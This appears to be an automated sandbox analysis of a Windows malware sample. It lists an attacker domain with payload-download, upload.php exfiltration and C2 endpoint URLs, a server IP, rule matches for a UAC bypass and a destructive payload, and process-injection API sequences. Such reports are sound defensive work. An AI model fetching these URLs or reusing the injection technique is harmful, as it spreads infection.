                        Source: WindosCPUsystem.exe, 00000008.00000003.2430713857.000001BBFD920000.00000004.00000001.00020000.00000000.sdmp, ggbfqxmgkimt.sys.8.dr | String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                        Source: WindosCPUsystem.exe, 00000008.00000003.2430713857.000001BBFD920000.00000004.00000001.00020000.00000000.sdmp, ggbfqxmgkimt.sys.8.dr | String found in binary or memory: http://crl.globalsign.net/Root.crl0
                        Source: WindosCPUsystem.exe, 00000008.00000003.2430713857.000001BBFD920000.00000004.00000001.00020000.00000000.sdmp, ggbfqxmgkimt.sys.8.dr | String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                        Source: WindosCPUsystem.exe, 00000008.00000003.2430713857.000001BBFD920000.00000004.00000001.00020000.00000000.sdmp, ggbfqxmgkimt.sys.8.dr | String found in binary or memory: http://crl.globalsign.net/primobject.crl0
                        Source: explorer.exe, 00000020.00000003.3390678126.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390824384.0000000000739000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://r11.i.lencr.org/0
                        Source: explorer.exe, 00000020.00000003.3390678126.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390824384.0000000000739000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://r11.o.lencr.org0#
                        Source: explorer.exe, 00000020.00000003.3390678126.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.4654016391.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390678126.0000000002C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768810420.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/
                        Source: explorer.exe, 00000020.00000003.3390678126.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390756248.0000000002C39000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
                        Source: explorer.exe, 00000020.00000003.3768810420.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390756248.0000000002C50000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/=
                        Source: explorer.exe, 00000020.00000003.3390678126.0000000002C29000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/
                        Source: explorer.exe, 00000020.00000003.3390678126.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768810420.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390756248.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390756248.0000000002C39000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
                        Source: explorer.exe, 00000020.00000003.3390678126.0000000002C29000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/3R
                        Source: explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://woo097878781.win
                        Source: explorer.exe, 00000004.00000003.2270189206.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2875477141.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2887715751.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2885657484.000000000385D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/
                        Source: file.exeString found in binary or memory: https://woo097878781.win/32.EXE
                        Source: file.exeString found in binary or memory: https://woo097878781.win/32.EXEhttps://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66M
                        Source: explorer.exe, explorer.exe, 00000004.00000003.2203432137.0000000000B29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3101400503.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2396860265.0000000000B56000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2178464277.0000000000B29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4653721171.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2190178303.0000000000B29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2168797360.0000000000B29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2396889180.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/64.EXE
                        Source: file.exe, 00000000.00000003.2116236371.0000000002875000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66Mozilla/5.0
                        Source: explorer.exe, 00000020.00000002.4653016535.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2475569173.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768529697.000000000072C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.php
                        Source: explorer.exe, 00000020.00000002.4653016535.00000000006D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.php--cinit-version=3.4.1--tls--cinit-idle-wait=5--cinit-idl
                        Source: explorer.exe, 00000020.00000003.2475407656.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390824384.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.4653016535.000000000072C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2475569173.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768529697.000000000072C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.php1=
                        Source: explorer.exe, 00000020.00000002.4653016535.0000000000699000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.phpK
                        Source: explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.phpQ=C
                        Source: explorer.exe, 00000021.00000003.2875477141.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2887715751.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2885657484.000000000385D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/U
                        Source: file.exe, 00000000.00000003.2116236371.0000000002870000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4654386934.0000000002C07000.00000004.00000010.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2396889180.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2234164355.0000000000AD2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3044272983.0000000002ED9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2233935293.0000000000B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/WindosCPUsystem.exe
                        Source: explorer.exe, 00000004.00000003.3104820467.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3772296676.0000000002EEE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4654526763.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3044272983.0000000002EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/WindosCPUsystem.exeWindowsSystem1
                        Source: file.exeString found in binary or memory: https://woo097878781.win/WindosCPUsystem.exeWindowsSystem1WindosCPUsystem.exe
                        Source: explorer.exe, 00000004.00000003.2234164355.0000000000AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/WindosCPUsystem.exey
                        Source: explorer.exe, 00000004.00000003.2270189206.0000000000B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/Z
                        Source: explorer.exe, 00000021.00000003.2875477141.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2887715751.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2885657484.000000000385D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/i
                        Source: explorer.exe, 00000004.00000003.2234164355.0000000000AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/p
                        Source: explorer.exe, 00000021.00000002.2886931990.0000000001183000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/qS
                        Source: explorer.exe, 00000021.00000003.2875477141.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2887715751.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2885657484.000000000385D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/r
                        Source: explorer.exe, 00000021.00000003.2875477141.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2887715751.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2885657484.000000000385D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/ra
                        Source: explorer.exe, explorer.exe, 00000024.00000002.4590293308.0000000002AD8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/upload.php
                        Source: explorer.exe, 00000021.00000003.2847225481.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2887033059.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/upload.php3
                        Source: explorer.exe, 00000004.00000003.2396889180.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/v
                        Source: explorer.exe, 00000004.00000003.3101400503.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4653721171.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2396889180.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win:443/64.EXE
                        Source: explorer.exe, 00000004.00000003.2234164355.0000000000ACB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win:443/WindosCPUsystem.exeD9D
                        Source: explorer.exe, 00000021.00000003.2847225481.000000000121B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2887033059.000000000121B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2847508835.000000000121B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2886931990.00000000011A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win:443/upload.php
                        Source: explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.winPTt
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                        Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49708 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49712 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49738 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49756 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49775 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49804 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49823 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49857 version: TLS 1.2
                        Source: C:\Windows\explorer.exeCode function: 4_2_00BF2310 WaitForSingleObject,RtlExitUserThread,GetAsyncKeyState,Sleep,OpenEventW,SetEvent,CloseHandle,RtlExitUserThread,4_2_00BF2310
                        Source: explorer.exe, 00000004.00000002.4654714736.0000000003790000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ENCMARK RegisterRawInputDevicesmemstr_4bb8ffd0-5

                        Operating System Destruction

                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process information set: 01 00 00 00

                        System Summary

                        Source: file.exe, type: SAMPLE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 4.2.explorer.exe.be0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0.0.file.exe.7c0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0.2.file.exe.7c0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 36.2.explorer.exe.29f0000.0.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer Payload Author: kevoreilly
                        Source: 35.2.explorer.exe.27b0000.0.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer Payload Author: kevoreilly
                        Source: 33.2.explorer.exe.1390000.0.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer Payload Author: kevoreilly
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                        Source: C:\Windows\explorer.exe | Process Stats: CPU usage > 49%
                        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D38D0 GetCurrentProcess,Wow64DisableWow64FsRedirection,_memset,lstrcpyW,_memset,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,_memmove,_memmove,_memmove,lstrcpyW,lstrcpyW,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,_memmove,CreateEventW,GetModuleHandle64,GetProcAddress64,X64Call,WaitForSingleObject,ResetEvent,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtClose,CloseHandle,Wow64DisableWow64FsRedirection,ResetEvent,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,Wow64DisableWow64FsRedirection
                        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007CA1B0 GetCurrentProcess,_memset,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,_memmove,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,_memmove,NtMapViewOfSection,_memset,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle
                        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D44B0 CreateProcessW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,_memmove,LoadLibraryW,GetProcAddress,GetProcAddress,lstrcpyW,lstrcpyW,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,_memmove,CreateEventW,RtlCreateUserThread,WaitForSingleObject,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtClose,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,CloseHandle
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00BF0740 CreateProcessW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,LoadLibraryW,GetProcAddress,GetProcAddress,lstrcpyW,lstrcpyW,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,CreateEventW,RtlCreateUserThread,WaitForSingleObject,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtClose,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,CloseHandle
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00BF11A4 CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,CloseHandle
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00BE7940 GetCurrentProcess,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,GetThreadContext,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,TerminateProcess
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Code function: 8_2_00007FF60AA91394 NtCreateProcess
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | File created: C:\Users\user\AppData\Local\Temp\ggbfqxmgkimt.sys
                        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007E505A
                        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007E4827
                        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007E5814
                        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F01AF
                        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F1B14
                        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007EFC5E
                        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007E542C
                        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007E4CBC
                        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F0DDC
                        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007DAED9
                        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D1690
                        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007DAE80
                        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F0700
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00BE1000
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00C02210
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00BF9CB0
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00BE4DA0
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00C05D20
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00BE7EF0
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00BF0740
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00BEB8B0
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00C0E88C
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00BEE8C0
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00BEA8C0
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00C0F834
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00C139FC
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00BE7940
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00C152C8
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00BF12B0
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00C0CAFC
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00C02286
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00C09BEC
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00BECBF0
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00C15B2C
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00BFA4A0
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00BFC491
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00BFACE0
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00BFC410
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00C165D8
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00BF2690
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00BEDE20
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00C02660
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00BFCFC0
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Code function: 8_2_00007FF60AA93480
                        Source: C:\Windows\explorer.exe | Code function: 33_2_01391000
                        Source: C:\Windows\explorer.exe | Code function: 33_2_013993C0
                        Source: C:\Windows\explorer.exe | Code function: 33_2_013955D0
                        Source: C:\Windows\explorer.exe | Code function: 33_2_013934B0
                        Source: C:\Windows\explorer.exe | Code function: 33_2_01396640
                        Source: C:\Windows\explorer.exe | Code function: 33_2_01396E70
                        Source: C:\Windows\explorer.exe | Code function: 33_2_014281A0
                        Source: C:\Windows\explorer.exe | Code function: 33_2_0145B0E0
                        Source: C:\Windows\explorer.exe | Code function: 33_2_013A6290
                        Source: C:\Windows\explorer.exe | Code function: 33_2_014502A0
                        Source: C:\Windows\explorer.exe | Code function: 33_2_01416510
                        Source: C:\Windows\explorer.exe | Code function: 33_2_013C05A0
                        Source: C:\Windows\explorer.exe | Code function: 33_2_0141A410
                        Source: C:\Windows\explorer.exe | Code function: 33_2_014384C0
                        Source: C:\Windows\explorer.exe | Code function: 33_2_01451480
                        Source: C:\Windows\explorer.exe | Code function: 33_2_0139A7A0
                        Source: C:\Windows\explorer.exe | Code function: 33_2_0145A674
                        Source: C:\Windows\explorer.exe | Code function: 33_2_0145D6B8
                        Source: C:\Windows\explorer.exe | Code function: 33_2_01450900
                        Source: C:\Windows\explorer.exe | Code function: 33_2_0145B84C
                        Source: C:\Windows\explorer.exe | Code function: 33_2_0142282A
                        Source: C:\Windows\explorer.exe | Code function: 33_2_0145AAF4
                        Source: C:\Windows\explorer.exe | Code function: 33_2_01451A90
                        Source: C:\Windows\explorer.exe | Code function: 33_2_0144FDF0
                        Source: C:\Windows\explorer.exe | Code function: 33_2_01455DF0
                        Source: C:\Windows\explorer.exe | Code function: 33_2_01454D94
                        Source: C:\Windows\explorer.exe | Code function: 33_2_013ADC50
                        Source: C:\Windows\explorer.exe | Code function: 33_2_0139AF00
                        Source: C:\Windows\explorer.exe | Code function: 33_2_01450FC0
                        Source: C:\Windows\explorer.exe | Code function: 33_2_01421F8F
                        Source: C:\Windows\explorer.exe | Code function: 33_2_01395E10
                        Source: C:\Windows\explorer.exe | Code function: 33_2_0142FE70
                        Source: C:\Windows\explorer.exe | Code function: 33_2_0141EEC0
                        Source: C:\Windows\explorer.exe | Code function: 33_2_01453EB0
                        Source: C:\Windows\explorer.exe | Code function: 33_2_013C3EC0
                        Source: C:\Windows\explorer.exe | Code function: 35_2_027B1000
                        Source: C:\Windows\explorer.exe | Code function: 35_2_027B6640
                        Source: C:\Windows\explorer.exe | Code function: 35_2_027B34B0
                        Source: C:\Windows\explorer.exe | Code function: 35_2_027B6E70
                        Source: C:\Windows\explorer.exe | Code function: 35_2_027B5E10
                        Source: C:\Windows\explorer.exe | Code function: 35_2_028702A0
                        Source: C:\Windows\explorer.exe | Code function: 35_2_027C6290
                        Source: C:\Windows\explorer.exe | Code function: 35_2_027B93C0
                        Source: C:\Windows\explorer.exe | Code function: 35_2_0287B0E0
                        Source: C:\Windows\explorer.exe | Code function: 35_2_028481A0
                        Source: C:\Windows\explorer.exe | Code function: 35_2_0287D6B8
                        Source: C:\Windows\explorer.exe | Code function: 35_2_0287A674
                        Source: C:\Windows\explorer.exe | Code function: 35_2_027BA7A0
                        Source: C:\Windows\explorer.exe | Code function: 35_2_02871480
                        Source: C:\Windows\explorer.exe | Code function: 35_2_028584C0
                        Source: C:\Windows\explorer.exe | Code function: 35_2_0283A410
                        Source: C:\Windows\explorer.exe | Code function: 35_2_02836510
                        Source: C:\Windows\explorer.exe | Code function: 35_2_027B55D0
                        Source: C:\Windows\explorer.exe | Code function: 35_2_027E05A0
                        Source: C:\Windows\explorer.exe | Code function: 35_2_02871A90
                        Source: C:\Windows\explorer.exe | Code function: 35_2_0287AAF4
                        Source: C:\Windows\explorer.exe | Code function: 35_2_0284282A
                        Source: C:\Windows\explorer.exe | Code function: 35_2_0287B84C
                        Source: C:\Windows\explorer.exe | Code function: 35_2_02870900
                        Source: C:\Windows\explorer.exe | Code function: 35_2_02873EB0
                        Source: C:\Windows\explorer.exe | Code function: 35_2_0283EEC0
                        Source: C:\Windows\explorer.exe | Code function: 35_2_027E3EC0
                        Source: C:\Windows\explorer.exe | Code function: 35_2_0284FE70
                        Source: C:\Windows\explorer.exe | Code function: 35_2_02841F8F
                        Source: C:\Windows\explorer.exe | Code function: 35_2_02870FC0
                        Source: C:\Windows\explorer.exe | Code function: 35_2_027BAF00
                        Source: C:\Windows\explorer.exe | Code function: 35_2_027CDC50
                        Source: C:\Windows\explorer.exe | Code function: 35_2_02874D94
                        Source: C:\Windows\explorer.exe | Code function: 35_2_0286FDF0
                        Source: C:\Windows\explorer.exe | Code function: 35_2_02875DF0
                        Source: C:\Windows\explorer.exe | Code function: 36_2_029F1000
                        Source: C:\Windows\explorer.exe | Code function: 36_2_029F6640
                        Source: C:\Windows\explorer.exe | Code function: 36_2_029F34B0
                        Source: C:\Windows\explorer.exe | Code function: 36_2_029F5E10
                        Source: C:\Windows\explorer.exe | Code function: 36_2_029F6E70
